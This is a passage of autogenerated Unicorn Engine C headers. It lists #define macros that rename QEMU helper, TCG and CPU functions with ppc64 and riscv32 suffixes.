#define helper_gvec_ltu8 helper_gvec_ltu8_ppc64 #define helper_gvec_leu8 helper_gvec_leu8_ppc64 #define helper_gvec_eq16 helper_gvec_eq16_ppc64 #define helper_gvec_ne16 helper_gvec_ne16_ppc64 #define helper_gvec_lt16 helper_gvec_lt16_ppc64 #define helper_gvec_le16 helper_gvec_le16_ppc64 #define helper_gvec_ltu16 helper_gvec_ltu16_ppc64 #define helper_gvec_leu16 helper_gvec_leu16_ppc64 #define helper_gvec_eq32 helper_gvec_eq32_ppc64 #define helper_gvec_ne32 helper_gvec_ne32_ppc64 #define helper_gvec_lt32 helper_gvec_lt32_ppc64 #define helper_gvec_le32 helper_gvec_le32_ppc64 #define helper_gvec_ltu32 helper_gvec_ltu32_ppc64 #define helper_gvec_leu32 helper_gvec_leu32_ppc64 #define helper_gvec_eq64 helper_gvec_eq64_ppc64 #define helper_gvec_ne64 helper_gvec_ne64_ppc64 #define helper_gvec_lt64 helper_gvec_lt64_ppc64 #define helper_gvec_le64 helper_gvec_le64_ppc64 #define helper_gvec_ltu64 helper_gvec_ltu64_ppc64 #define helper_gvec_leu64 helper_gvec_leu64_ppc64 #define helper_gvec_ssadd8 helper_gvec_ssadd8_ppc64 #define helper_gvec_ssadd16 helper_gvec_ssadd16_ppc64 #define helper_gvec_ssadd32 helper_gvec_ssadd32_ppc64 #define helper_gvec_ssadd64 helper_gvec_ssadd64_ppc64 #define helper_gvec_sssub8 helper_gvec_sssub8_ppc64 #define helper_gvec_sssub16 helper_gvec_sssub16_ppc64 #define helper_gvec_sssub32 helper_gvec_sssub32_ppc64 #define helper_gvec_sssub64 helper_gvec_sssub64_ppc64 #define helper_gvec_usadd8 helper_gvec_usadd8_ppc64 #define helper_gvec_usadd16 helper_gvec_usadd16_ppc64 #define helper_gvec_usadd32 helper_gvec_usadd32_ppc64 #define helper_gvec_usadd64 helper_gvec_usadd64_ppc64 #define helper_gvec_ussub8 helper_gvec_ussub8_ppc64 #define helper_gvec_ussub16 helper_gvec_ussub16_ppc64 #define helper_gvec_ussub32 helper_gvec_ussub32_ppc64 #define helper_gvec_ussub64 helper_gvec_ussub64_ppc64 #define helper_gvec_smin8 helper_gvec_smin8_ppc64 #define helper_gvec_smin16 helper_gvec_smin16_ppc64 #define helper_gvec_smin32 helper_gvec_smin32_ppc64 #define helper_gvec_smin64 helper_gvec_smin64_ppc64 #define helper_gvec_smax8 helper_gvec_smax8_ppc64 #define helper_gvec_smax16 helper_gvec_smax16_ppc64 #define helper_gvec_smax32 helper_gvec_smax32_ppc64 #define helper_gvec_smax64 helper_gvec_smax64_ppc64 #define helper_gvec_umin8 helper_gvec_umin8_ppc64 #define helper_gvec_umin16 helper_gvec_umin16_ppc64 #define helper_gvec_umin32 helper_gvec_umin32_ppc64 #define helper_gvec_umin64 helper_gvec_umin64_ppc64 #define helper_gvec_umax8 helper_gvec_umax8_ppc64 #define helper_gvec_umax16 helper_gvec_umax16_ppc64 #define helper_gvec_umax32 helper_gvec_umax32_ppc64 #define helper_gvec_umax64 helper_gvec_umax64_ppc64 #define helper_gvec_bitsel helper_gvec_bitsel_ppc64 #define cpu_restore_state cpu_restore_state_ppc64 #define page_collection_lock page_collection_lock_ppc64 #define page_collection_unlock page_collection_unlock_ppc64 #define free_code_gen_buffer free_code_gen_buffer_ppc64 #define tcg_exec_init tcg_exec_init_ppc64 #define tb_cleanup tb_cleanup_ppc64 #define tb_flush tb_flush_ppc64 #define tb_phys_invalidate tb_phys_invalidate_ppc64 #define tb_gen_code tb_gen_code_ppc64 #define tb_exec_lock tb_exec_lock_ppc64 #define tb_exec_unlock tb_exec_unlock_ppc64 #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_ppc64 #define tb_invalidate_phys_range tb_invalidate_phys_range_ppc64 #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_ppc64 #define tb_check_watchpoint tb_check_watchpoint_ppc64 #define cpu_io_recompile cpu_io_recompile_ppc64 #define tb_flush_jmp_cache 
tb_flush_jmp_cache_ppc64 #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_ppc64 #define translator_loop_temp_check translator_loop_temp_check_ppc64 #define translator_loop translator_loop_ppc64 #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_ppc64 #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_ppc64 #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_ppc64 #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_ppc64 #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_ppc64 #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_ppc64 #define unassigned_mem_ops unassigned_mem_ops_ppc64 #define floatx80_infinity floatx80_infinity_ppc64 #define dup_const_func dup_const_func_ppc64 #define gen_helper_raise_exception gen_helper_raise_exception_ppc64 #define gen_helper_raise_interrupt gen_helper_raise_interrupt_ppc64 #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_ppc64 #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_ppc64 #define gen_helper_cpsr_read gen_helper_cpsr_read_ppc64 #define gen_helper_cpsr_write gen_helper_cpsr_write_ppc64 #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_ppc64 #define ppc_cpu_unrealize ppc_cpu_unrealize_ppc64 #define ppc_cpu_instance_finalize ppc_cpu_instance_finalize_ppc64 #define ppc_cpu_do_interrupt ppc_cpu_do_interrupt_ppc64 #define ppc_cpu_do_system_reset ppc_cpu_do_system_reset_ppc64 #define ppc_cpu_do_fwnmi_machine_check ppc_cpu_do_fwnmi_machine_check_ppc64 #define ppc_cpu_exec_interrupt ppc_cpu_exec_interrupt_ppc64 #define raise_exception_err_ra raise_exception_err_ra_ppc64 #define raise_exception_err raise_exception_err_ppc64 #define raise_exception raise_exception_ppc64 #define raise_exception_ra raise_exception_ra_ppc64 #define helper_raise_exception_err helper_raise_exception_err_ppc64 #define helper_store_msr helper_store_msr_ppc64 #define helper_rfi helper_rfi_ppc64 #define helper_40x_rfci helper_40x_rfci_ppc64 #define helper_rfdi helper_rfdi_ppc64 #define helper_rfci helper_rfci_ppc64 #define helper_rfmci helper_rfmci_ppc64 #define helper_tw helper_tw_ppc64 #define helper_rfsvc helper_rfsvc_ppc64 #define helper_msgclr helper_msgclr_ppc64 #define helper_msgsnd helper_msgsnd_ppc64 #define helper_book3s_msgclr helper_book3s_msgclr_ppc64 #define ppc_cpu_do_unaligned_access ppc_cpu_do_unaligned_access_ppc64 #define helper_divweu helper_divweu_ppc64 #define helper_divwe helper_divwe_ppc64 #define helper_sraw helper_sraw_ppc64 #define helper_popcntb helper_popcntb_ppc64 #define helper_div helper_div_ppc64 #define helper_divo helper_divo_ppc64 #define helper_divs helper_divs_ppc64 #define helper_divso helper_divso_ppc64 #define helper_602_mfrom helper_602_mfrom_ppc64 #define helper_mtvscr helper_mtvscr_ppc64 #define helper_vaddcuw helper_vaddcuw_ppc64 #define helper_vprtybw helper_vprtybw_ppc64 #define helper_vprtybd helper_vprtybd_ppc64 #define helper_vprtybq helper_vprtybq_ppc64 #define helper_vmuluwm helper_vmuluwm_ppc64 #define helper_vaddfp helper_vaddfp_ppc64 #define helper_vsubfp helper_vsubfp_ppc64 #define helper_vminfp helper_vminfp_ppc64 #define helper_vmaxfp helper_vmaxfp_ppc64 #define helper_vmaddfp helper_vmaddfp_ppc64 #define helper_vnmsubfp helper_vnmsubfp_ppc64 #define helper_vaddsbs helper_vaddsbs_ppc64 #define helper_vsubsbs helper_vsubsbs_ppc64 #define helper_vsubshs helper_vsubshs_ppc64 #define helper_vaddsws helper_vaddsws_ppc64 #define helper_vsubsws helper_vsubsws_ppc64 #define helper_vaddubs helper_vaddubs_ppc64 #define helper_vsububs 
helper_vsububs_ppc64 #define helper_vadduhs helper_vadduhs_ppc64 #define helper_vsubuhs helper_vsubuhs_ppc64 #define helper_vadduws helper_vadduws_ppc64 #define helper_vsubuws helper_vsubuws_ppc64 #define helper_vavgsb helper_vavgsb_ppc64 #define helper_vavgub helper_vavgub_ppc64 #define helper_vavgsh helper_vavgsh_ppc64 #define helper_vavguh helper_vavguh_ppc64 #define helper_vavgsw helper_vavgsw_ppc64 #define helper_vabsdub helper_vabsdub_ppc64 #define helper_vabsduh helper_vabsduh_ppc64 #define helper_vabsduw helper_vabsduw_ppc64 #define helper_vcfux helper_vcfux_ppc64 #define helper_vcfsx helper_vcfsx_ppc64 #define helper_vcmpequb helper_vcmpequb_ppc64 #define helper_vcmpequb_dot helper_vcmpequb_dot_ppc64 #define helper_vcmpequw helper_vcmpequw_ppc64 #define helper_vcmpequw_dot helper_vcmpequw_dot_ppc64 #define helper_vcmpequd helper_vcmpequd_ppc64 #define helper_vcmpequd_dot helper_vcmpequd_dot_ppc64 #define helper_vcmpgtub helper_vcmpgtub_ppc64 #define helper_vcmpgtub_dot helper_vcmpgtub_dot_ppc64 #define helper_vcmpgtuh helper_vcmpgtuh_ppc64 #define helper_vcmpgtuh_dot helper_vcmpgtuh_dot_ppc64 #define helper_vcmpgtuw helper_vcmpgtuw_ppc64 #define helper_vcmpgtuw_dot helper_vcmpgtuw_dot_ppc64 #define helper_vcmpgtud helper_vcmpgtud_ppc64 #define helper_vcmpgtud_dot helper_vcmpgtud_dot_ppc64 #define helper_vcmpgtsb helper_vcmpgtsb_ppc64 #define helper_vcmpgtsb_dot helper_vcmpgtsb_dot_ppc64 #define helper_vcmpgtsh helper_vcmpgtsh_ppc64 #define helper_vcmpgtsh_dot helper_vcmpgtsh_dot_ppc64 #define helper_vcmpgtsw helper_vcmpgtsw_ppc64 #define helper_vcmpgtsw_dot helper_vcmpgtsw_dot_ppc64 #define helper_vcmpgtsd helper_vcmpgtsd_ppc64 #define helper_vcmpgtsd_dot helper_vcmpgtsd_dot_ppc64 #define helper_vcmpnezb helper_vcmpnezb_ppc64 #define helper_vcmpnezb_dot helper_vcmpnezb_dot_ppc64 #define helper_vcmpnezw helper_vcmpnezw_ppc64 #define helper_vcmpnezw_dot helper_vcmpnezw_dot_ppc64 #define helper_vcmpneb helper_vcmpneb_ppc64 #define helper_vcmpneb_dot helper_vcmpneb_dot_ppc64 #define helper_vcmpneh helper_vcmpneh_ppc64 #define helper_vcmpneh_dot helper_vcmpneh_dot_ppc64 #define helper_vcmpnew helper_vcmpnew_ppc64 #define helper_vcmpnew_dot helper_vcmpnew_dot_ppc64 #define helper_vcmpeqfp helper_vcmpeqfp_ppc64 #define helper_vcmpeqfp_dot helper_vcmpeqfp_dot_ppc64 #define helper_vcmpgefp helper_vcmpgefp_ppc64 #define helper_vcmpgefp_dot helper_vcmpgefp_dot_ppc64 #define helper_vcmpgtfp helper_vcmpgtfp_ppc64 #define helper_vcmpgtfp_dot helper_vcmpgtfp_dot_ppc64 #define helper_vcmpbfp helper_vcmpbfp_ppc64 #define helper_vcmpbfp_dot helper_vcmpbfp_dot_ppc64 #define helper_vctuxs helper_vctuxs_ppc64 #define helper_vctsxs helper_vctsxs_ppc64 #define helper_vclzlsbb helper_vclzlsbb_ppc64 #define helper_vctzlsbb helper_vctzlsbb_ppc64 #define helper_vmhaddshs helper_vmhaddshs_ppc64 #define helper_vmhraddshs helper_vmhraddshs_ppc64 #define helper_vmladduhm helper_vmladduhm_ppc64 #define helper_vmrglb helper_vmrglb_ppc64 #define helper_vmrghb helper_vmrghb_ppc64 #define helper_vmrglh helper_vmrglh_ppc64 #define
helper_vmrghh helper_vmrghh_ppc64 #define helper_vmrglw helper_vmrglw_ppc64 #define helper_vmrghw helper_vmrghw_ppc64 #define helper_vmsummbm helper_vmsummbm_ppc64 #define helper_vmsumshs helper_vmsumshs_ppc64 #define helper_vmsumubm helper_vmsumubm_ppc64 #define helper_vmsumuhm helper_vmsumuhm_ppc64 #define helper_vmulesb helper_vmulesb_ppc64 #define helper_vmulosb helper_vmulosb_ppc64 #define helper_vmulesh helper_vmulesh_ppc64 #define helper_vmulesw helper_vmulesw_ppc64 #define helper_vmuleub helper_vmuleub_ppc64 #define helper_vmuloub helper_vmuloub_ppc64 #define helper_vmuleuh helper_vmuleuh_ppc64 #define helper_vmulouh helper_vmulouh_ppc64 #define helper_vmuleuw helper_vmuleuw_ppc64 #define helper_vmulouw helper_vmulouw_ppc64 #define helper_vperm helper_vperm_ppc64 #define helper_vpermr helper_vpermr_ppc64 #define helper_vbpermd helper_vbpermd_ppc64 #define helper_vpmsumb helper_vpmsumb_ppc64 #define helper_vpmsumh helper_vpmsumh_ppc64 #define helper_vpmsumw helper_vpmsumw_ppc64 #define helper_vpmsumd helper_vpmsumd_ppc64 #define helper_vpkpx helper_vpkpx_ppc64 #define helper_vpkshss helper_vpkshss_ppc64 #define helper_vpkshus helper_vpkshus_ppc64 #define helper_vpkswss helper_vpkswss_ppc64 #define helper_vpkswus helper_vpkswus_ppc64 #define helper_vpksdss helper_vpksdss_ppc64 #define helper_vpksdus helper_vpksdus_ppc64 #define helper_vpkuhus helper_vpkuhus_ppc64 #define helper_vpkuwus helper_vpkuwus_ppc64 #define helper_vpkudus helper_vpkudus_ppc64 #define helper_vpkuhum helper_vpkuhum_ppc64 #define helper_vpkuwum helper_vpkuwum_ppc64 #define helper_vpkudum helper_vpkudum_ppc64 #define helper_vrefp helper_vrefp_ppc64 #define helper_vrfin helper_vrfin_ppc64 #define helper_vrfim helper_vrfim_ppc64 #define helper_vrfip helper_vrfip_ppc64 #define helper_vrfiz helper_vrfiz_ppc64 #define helper_vrlb helper_vrlb_ppc64 #define helper_vrlh helper_vrlh_ppc64 #define helper_vrlw helper_vrlw_ppc64 #define helper_vrld helper_vrld_ppc64 #define helper_vrsqrtefp helper_vrsqrtefp_ppc64 #define helper_vrldmi helper_vrldmi_ppc64 #define helper_vrlwmi helper_vrlwmi_ppc64 #define helper_vrldnm helper_vrldnm_ppc64 #define helper_vrlwnm helper_vrlwnm_ppc64 #define helper_vsel helper_vsel_ppc64 #define helper_vexptefp helper_vexptefp_ppc64 #define helper_vlogefp helper_vlogefp_ppc64 #define helper_vextublx helper_vextublx_ppc64 #define helper_vextuhlx helper_vextuhlx_ppc64 #define helper_vextuwlx helper_vextuwlx_ppc64 #define helper_vextubrx helper_vextubrx_ppc64 #define helper_vextuhrx helper_vextuhrx_ppc64 #define helper_vextuwrx helper_vextuwrx_ppc64 #define helper_vslv helper_vslv_ppc64 #define helper_vsrv helper_vsrv_ppc64 #define helper_vsldoi helper_vsldoi_ppc64 #define helper_vslo helper_vslo_ppc64 #define helper_vinsertb helper_vinsertb_ppc64 #define helper_vinserth helper_vinserth_ppc64 #define helper_vinsertw helper_vinsertw_ppc64 #define helper_vinsertd helper_vinsertd_ppc64 #define helper_vextractub helper_vextractub_ppc64 #define helper_vextractuh helper_vextractuh_ppc64 #define helper_vextractuw helper_vextractuw_ppc64 #define helper_vextractd helper_vextractd_ppc64 #define helper_xxextractuw helper_xxextractuw_ppc64 #define helper_xxinsertw helper_xxinsertw_ppc64 #define helper_vextsb2w helper_vextsb2w_ppc64 #define helper_vextsb2d helper_vextsb2d_ppc64 #define helper_vextsh2w helper_vextsh2w_ppc64 #define helper_vextsh2d helper_vextsh2d_ppc64 #define helper_vnegw helper_vnegw_ppc64 #define helper_vnegd helper_vnegd_ppc64 #define helper_vsro helper_vsro_ppc64 #define helper_vsubcuw 
helper_vsubcuw_ppc64 #define helper_vsumsws helper_vsumsws_ppc64 #define helper_vsum2sws helper_vsum2sws_ppc64 #define helper_vsum4sbs helper_vsum4sbs_ppc64 #define helper_vsum4shs helper_vsum4shs_ppc64 #define helper_vsum4ubs helper_vsum4ubs_ppc64 #define helper_vupklpx helper_vupklpx_ppc64 #define helper_vupkhpx helper_vupkhpx_ppc64 #define helper_vupkhsb helper_vupkhsb_ppc64 #define helper_vupkhsh helper_vupkhsh_ppc64 #define helper_vupkhsw helper_vupkhsw_ppc64 #define helper_vupklsb helper_vupklsb_ppc64 #define helper_vupklsh helper_vupklsh_ppc64 #define helper_vupklsw helper_vupklsw_ppc64 #define helper_vclzb helper_vclzb_ppc64 #define helper_vclzh helper_vclzh_ppc64 #define helper_vctzb helper_vctzb_ppc64 #define helper_vctzh helper_vctzh_ppc64 #define helper_vctzw helper_vctzw_ppc64 #define helper_vctzd helper_vctzd_ppc64 #define helper_vpopcntb helper_vpopcntb_ppc64 #define helper_vpopcnth helper_vpopcnth_ppc64 #define helper_vpopcntw helper_vpopcntw_ppc64 #define helper_vpopcntd helper_vpopcntd_ppc64 #define helper_vadduqm helper_vadduqm_ppc64 #define helper_vaddeuqm helper_vaddeuqm_ppc64 #define helper_vaddcuq helper_vaddcuq_ppc64 #define helper_vaddecuq helper_vaddecuq_ppc64 #define helper_vsubuqm helper_vsubuqm_ppc64 #define helper_vsubeuqm helper_vsubeuqm_ppc64 #define helper_vsubcuq helper_vsubcuq_ppc64 #define helper_vsubecuq helper_vsubecuq_ppc64 #define helper_bcdadd helper_bcdadd_ppc64 #define helper_bcdsub helper_bcdsub_ppc64 #define helper_bcdcfn helper_bcdcfn_ppc64 #define helper_bcdctn helper_bcdctn_ppc64 #define helper_bcdcfz helper_bcdcfz_ppc64 #define helper_bcdctz helper_bcdctz_ppc64 #define helper_bcdcfsq helper_bcdcfsq_ppc64 #define helper_bcdctsq helper_bcdctsq_ppc64 #define helper_bcdcpsgn helper_bcdcpsgn_ppc64 #define helper_bcdsetsgn helper_bcdsetsgn_ppc64 #define helper_bcds helper_bcds_ppc64 #define helper_bcdus helper_bcdus_ppc64 #define helper_bcdsr helper_bcdsr_ppc64 #define helper_bcdtrunc helper_bcdtrunc_ppc64 #define helper_bcdutrunc helper_bcdutrunc_ppc64 #define helper_vsbox helper_vsbox_ppc64 #define helper_vcipher helper_vcipher_ppc64 #define helper_vcipherlast helper_vcipherlast_ppc64 #define helper_vncipher helper_vncipher_ppc64 #define helper_vncipherlast helper_vncipherlast_ppc64 #define helper_vshasigmaw helper_vshasigmaw_ppc64 #define helper_vshasigmad helper_vshasigmad_ppc64 #define helper_vpermxor helper_vpermxor_ppc64 #define helper_brinc helper_brinc_ppc64 #define helper_cntlsw32 helper_cntlsw32_ppc64 #define helper_cntlzw32 helper_cntlzw32_ppc64 #define helper_dlmzb helper_dlmzb_ppc64 #define helper_lmw helper_lmw_ppc64 #define helper_lsw helper_lsw_ppc64 #define helper_lswx helper_lswx_ppc64 #define helper_stsw helper_stsw_ppc64 #define helper_dcbz helper_dcbz_ppc64 #define helper_dcbzep helper_dcbzep_ppc64 #define helper_icbi helper_icbi_ppc64 #define helper_icbiep helper_icbiep_ppc64 #define helper_lscbx helper_lscbx_ppc64 #define helper_lvebx helper_lvebx_ppc64 #define helper_lvehx helper_lvehx_ppc64 #define helper_lvewx helper_lvewx_ppc64 #define helper_stvebx helper_stvebx_ppc64 #define helper_stvehx helper_stvehx_ppc64 #define helper_stvewx helper_stvewx_ppc64 #define helper_tbegin helper_tbegin_ppc64 #define helper_load_dump_spr helper_load_dump_spr_ppc64 #define helper_store_dump_spr helper_store_dump_spr_ppc64 #define helper_hfscr_facility_check helper_hfscr_facility_check_ppc64 #define helper_fscr_facility_check helper_fscr_facility_check_ppc64 #define helper_msr_facility_check helper_msr_facility_check_ppc64 #define 
helper_store_sdr1 helper_store_sdr1_ppc64 #define helper_store_pidr helper_store_pidr_ppc64 #define helper_store_lpidr helper_store_lpidr_ppc64 #define helper_store_hid0_601 helper_store_hid0_601_ppc64 #define helper_store_403_pbr helper_store_403_pbr_ppc64 #define helper_store_40x_dbcr0 helper_store_40x_dbcr0_ppc64 #define helper_store_40x_sler helper_store_40x_sler_ppc64 #define helper_clcs helper_clcs_ppc64 #define ppc_store_msr ppc_store_msr_ppc64 #define helper_fixup_thrm helper_fixup_thrm_ppc64 #define store_40x_sler store_40x_sler_ppc64 #define dump_mmu dump_mmu_ppc64 #define ppc_cpu_get_phys_page_debug ppc_cpu_get_phys_page_debug_ppc64 #define helper_store_ibatu helper_store_ibatu_ppc64 #define helper_store_ibatl helper_store_ibatl_ppc64 #define helper_store_dbatu helper_store_dbatu_ppc64 #define helper_store_dbatl helper_store_dbatl_ppc64 #define helper_store_601_batu helper_store_601_batu_ppc64 #define helper_store_601_batl helper_store_601_batl_ppc64 #define ppc_tlb_invalidate_all ppc_tlb_invalidate_all_ppc64 #define ppc_tlb_invalidate_one ppc_tlb_invalidate_one_ppc64 #define ppc_store_sdr1 ppc_store_sdr1_ppc64 #define helper_load_sr helper_load_sr_ppc64 #define helper_store_sr helper_store_sr_ppc64 #define helper_tlbia helper_tlbia_ppc64 #define helper_tlbie helper_tlbie_ppc64 #define helper_tlbiva helper_tlbiva_ppc64 #define helper_6xx_tlbd helper_6xx_tlbd_ppc64 #define helper_6xx_tlbi helper_6xx_tlbi_ppc64 #define helper_74xx_tlbd helper_74xx_tlbd_ppc64 #define helper_74xx_tlbi helper_74xx_tlbi_ppc64 #define helper_rac helper_rac_ppc64 #define helper_4xx_tlbre_hi helper_4xx_tlbre_hi_ppc64 #define helper_4xx_tlbre_lo helper_4xx_tlbre_lo_ppc64 #define helper_4xx_tlbwe_hi helper_4xx_tlbwe_hi_ppc64 #define helper_4xx_tlbwe_lo helper_4xx_tlbwe_lo_ppc64 #define helper_4xx_tlbsx helper_4xx_tlbsx_ppc64 #define helper_440_tlbwe helper_440_tlbwe_ppc64 #define helper_440_tlbre helper_440_tlbre_ppc64 #define helper_440_tlbsx helper_440_tlbsx_ppc64 #define helper_booke_setpid helper_booke_setpid_ppc64 #define helper_booke_set_eplc helper_booke_set_eplc_ppc64 #define helper_booke_set_epsc helper_booke_set_epsc_ppc64 #define helper_booke206_tlbwe helper_booke206_tlbwe_ppc64 #define helper_booke206_tlbre helper_booke206_tlbre_ppc64 #define helper_booke206_tlbsx helper_booke206_tlbsx_ppc64 #define helper_booke206_tlbivax helper_booke206_tlbivax_ppc64 #define helper_booke206_tlbilx0 helper_booke206_tlbilx0_ppc64 #define helper_booke206_tlbilx1 helper_booke206_tlbilx1_ppc64 #define helper_booke206_tlbilx3 helper_booke206_tlbilx3_ppc64 #define helper_booke206_tlbflush helper_booke206_tlbflush_ppc64 #define helper_check_tlb_flush_local helper_check_tlb_flush_local_ppc64 #define helper_check_tlb_flush_global helper_check_tlb_flush_global_ppc64 #define ppc_cpu_tlb_fill ppc_cpu_tlb_fill_ppc64 #define helper_load_tbl helper_load_tbl_ppc64 #define helper_load_tbu helper_load_tbu_ppc64 #define helper_load_atbl helper_load_atbl_ppc64 #define helper_load_atbu helper_load_atbu_ppc64 #define helper_load_vtb helper_load_vtb_ppc64 #define helper_load_601_rtcl helper_load_601_rtcl_ppc64 #define helper_load_601_rtcu helper_load_601_rtcu_ppc64 #define helper_store_tbl helper_store_tbl_ppc64 #define helper_store_tbu helper_store_tbu_ppc64 #define helper_store_atbl helper_store_atbl_ppc64 #define helper_store_atbu helper_store_atbu_ppc64 #define helper_store_601_rtcl helper_store_601_rtcl_ppc64 #define helper_store_601_rtcu helper_store_601_rtcu_ppc64 #define helper_load_decr helper_load_decr_ppc64 #define 
helper_store_decr helper_store_decr_ppc64 #define helper_load_hdecr helper_load_hdecr_ppc64 #define helper_store_hdecr helper_store_hdecr_ppc64 #define helper_store_vtb helper_store_vtb_ppc64 #define helper_store_tbu40 helper_store_tbu40_ppc64 #define helper_load_40x_pit helper_load_40x_pit_ppc64 #define helper_store_40x_pit helper_store_40x_pit_ppc64 #define helper_store_booke_tcr helper_store_booke_tcr_ppc64 #define helper_store_booke_tsr helper_store_booke_tsr_ppc64 #define helper_load_dcr helper_load_dcr_ppc64 #define helper_store_dcr helper_store_dcr_ppc64 #define helper_raise_exception helper_raise_exception_ppc64 #define helper_book3s_msgsnd helper_book3s_msgsnd_ppc64 #define helper_cmpb helper_cmpb_ppc64 #define helper_mfvscr helper_mfvscr_ppc64 #define helper_vaddshs helper_vaddshs_ppc64 #define helper_vavguw helper_vavguw_ppc64 #define helper_vcmpequh helper_vcmpequh_ppc64 #define helper_vcmpequh_dot helper_vcmpequh_dot_ppc64 #define helper_vcmpnezh helper_vcmpnezh_ppc64 #define helper_vcmpnezh_dot helper_vcmpnezh_dot_ppc64 #define helper_vmsumshm helper_vmsumshm_ppc64 #define helper_vmsumuhs helper_vmsumuhs_ppc64 #define helper_vmulosh helper_vmulosh_ppc64 #define helper_vmulosw helper_vmulosw_ppc64 #define helper_vbpermq helper_vbpermq_ppc64 #define helper_vextsw2d helper_vextsw2d_ppc64 #define helper_stmw helper_stmw_ppc64 #define ppc_translate_init ppc_translate_init_ppc64 #define cpu_ppc_init cpu_ppc_init_ppc64 #define gen_intermediate_code gen_intermediate_code_ppc64 #define restore_state_to_opc restore_state_to_opc_ppc64 #define ppc_set_irq ppc_set_irq_ppc64 #define ppc6xx_irq_init ppc6xx_irq_init_ppc64 #define ppc40x_core_reset ppc40x_core_reset_ppc64 #define ppc40x_chip_reset ppc40x_chip_reset_ppc64 #define ppc40x_system_reset ppc40x_system_reset_ppc64 #define store_40x_dbcr0 store_40x_dbcr0_ppc64 #define ppc40x_irq_init ppc40x_irq_init_ppc64 #define ppce500_irq_init ppce500_irq_init_ppc64 #define ppce500_set_mpic_proxy ppce500_set_mpic_proxy_ppc64 #define cpu_ppc_get_tb cpu_ppc_get_tb_ppc64 #define cpu_ppc_load_tbl cpu_ppc_load_tbl_ppc64 #define cpu_ppc_load_tbu cpu_ppc_load_tbu_ppc64 #define cpu_ppc_store_tbl cpu_ppc_store_tbl_ppc64 #define cpu_ppc_store_tbu cpu_ppc_store_tbu_ppc64 #define cpu_ppc_load_atbl cpu_ppc_load_atbl_ppc64 #define cpu_ppc_load_atbu cpu_ppc_load_atbu_ppc64 #define cpu_ppc_store_atbl cpu_ppc_store_atbl_ppc64 #define cpu_ppc_store_atbu cpu_ppc_store_atbu_ppc64 #define cpu_ppc_load_vtb cpu_ppc_load_vtb_ppc64 #define cpu_ppc_store_vtb cpu_ppc_store_vtb_ppc64 #define cpu_ppc_store_tbu40 cpu_ppc_store_tbu40_ppc64 #define ppc_decr_clear_on_delivery ppc_decr_clear_on_delivery_ppc64 #define cpu_ppc_load_decr cpu_ppc_load_decr_ppc64 #define cpu_ppc_load_hdecr cpu_ppc_load_hdecr_ppc64 #define cpu_ppc_load_purr cpu_ppc_load_purr_ppc64 #define cpu_ppc_store_decr cpu_ppc_store_decr_ppc64 #define cpu_ppc_store_hdecr cpu_ppc_store_hdecr_ppc64 #define cpu_ppc_store_purr cpu_ppc_store_purr_ppc64 #define cpu_ppc_tb_init cpu_ppc_tb_init_ppc64 #define cpu_ppc601_load_rtcu cpu_ppc601_load_rtcu_ppc64 #define cpu_ppc601_store_rtcu cpu_ppc601_store_rtcu_ppc64 #define cpu_ppc601_load_rtcl cpu_ppc601_load_rtcl_ppc64 #define cpu_ppc601_store_rtcl cpu_ppc601_store_rtcl_ppc64 #define load_40x_pit load_40x_pit_ppc64 #define store_40x_pit store_40x_pit_ppc64 #define ppc_40x_timers_init ppc_40x_timers_init_ppc64 #define ppc_dcr_read ppc_dcr_read_ppc64 #define ppc_dcr_write ppc_dcr_write_ppc64 #define ppc_dcr_register ppc_dcr_register_ppc64 #define ppc_dcr_init 
ppc_dcr_init_ppc64 #define ppc_cpu_pir ppc_cpu_pir_ppc64 #define ppc_irq_reset ppc_irq_reset_ppc64 #define store_booke_tsr store_booke_tsr_ppc64 #define get_pteg_offset32 get_pteg_offset32_ppc64 #define ppc_booke_timers_init ppc_booke_timers_init_ppc64 #define ppc_hash32_handle_mmu_fault ppc_hash32_handle_mmu_fault_ppc64 #define gen_helper_store_booke_tsr gen_helper_store_booke_tsr_ppc64 #define gen_helper_store_booke_tcr gen_helper_store_booke_tcr_ppc64 #define store_booke_tcr store_booke_tcr_ppc64 #define ppc_hash32_get_phys_page_debug ppc_hash32_get_phys_page_debug_ppc64
#endif
unicorn-2.1.1/qemu/riscv32.h
/* Autogen header for Unicorn Engine - DONOT MODIFY */
#ifndef UNICORN_AUTOGEN_riscv32_H
#define UNICORN_AUTOGEN_riscv32_H
#ifndef UNICORN_ARCH_POSTFIX
#define UNICORN_ARCH_POSTFIX _riscv32
#endif
#define unicorn_fill_tlb unicorn_fill_tlb_riscv32 #define reg_read reg_read_riscv32 #define reg_write reg_write_riscv32 #define uc_init uc_init_riscv32 #define uc_add_inline_hook uc_add_inline_hook_riscv32 #define uc_del_inline_hook uc_del_inline_hook_riscv32 #define tb_invalidate_phys_range tb_invalidate_phys_range_riscv32 #define use_idiv_instructions use_idiv_instructions_riscv32 #define arm_arch arm_arch_riscv32 #define tb_target_set_jmp_target tb_target_set_jmp_target_riscv32 #define have_bmi1 have_bmi1_riscv32 #define have_popcnt have_popcnt_riscv32 #define have_avx1 have_avx1_riscv32 #define have_avx2 have_avx2_riscv32 #define have_isa have_isa_riscv32 #define have_altivec have_altivec_riscv32 #define have_vsx have_vsx_riscv32 #define flush_icache_range flush_icache_range_riscv32 #define s390_facilities s390_facilities_riscv32 #define tcg_dump_op tcg_dump_op_riscv32 #define tcg_dump_ops tcg_dump_ops_riscv32 #define tcg_gen_and_i64 tcg_gen_and_i64_riscv32 #define tcg_gen_discard_i64 tcg_gen_discard_i64_riscv32 #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_riscv32 #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_riscv32 #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_riscv32 #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_riscv32 #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_riscv32 #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_riscv32 